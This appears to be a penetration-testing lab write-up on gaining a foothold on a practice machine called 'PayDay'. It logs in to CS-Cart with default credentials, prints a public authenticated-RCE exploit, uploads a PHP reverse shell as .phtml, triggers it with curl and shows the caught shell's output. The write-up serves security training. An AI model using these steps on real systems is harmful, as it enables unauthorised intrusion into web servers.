InfoSec LAB

PayDay_Exploitation

Created: 2 min read

RCE

The admin page is accessible via using a weak/default credential; admin:admin

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit -x php/webapps/48891.txt
  Exploit: CS-Cart 1.3.3 - authenticated RCE
      URL: https://www.exploit-db.com/exploits/48891
     Path: /usr/share/exploitdb/exploits/php/webapps/48891.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
 
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
 
 
 
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!

There is a RCE exploit via file upload

Going to the Template editor under the LOOK AND FEEL tab

Changing the extension and uploading the payload

Uploaded file is available at the /skins directory

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -i http://$IP/skins/shell.phtml

Triggering the shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ nnc 9999                                                             
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.116.39] 51842
SOCKET: Shell has connected! PID: 5091
whoami
www-data
hostname
payday
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:9E:B2:F4  
          inet addr:192.168.116.39  Bcast:192.168.116.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe9e:b2f4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37195 errors:1 dropped:1 overruns:0 frame:0
          TX packets:22040 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2933900 (2.7 MB)  TX bytes:2122198 (2.0 MB)
          Interrupt:17 Base address:0x2000 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:503 errors:0 dropped:0 overruns:0 frame:0
          TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:682031 (666.0 KB)  TX bytes:682031 (666.0 KB)

Initial Foothold established to the target system as the www-data account via file upload to RCE

Interactive Graph View

Backlinks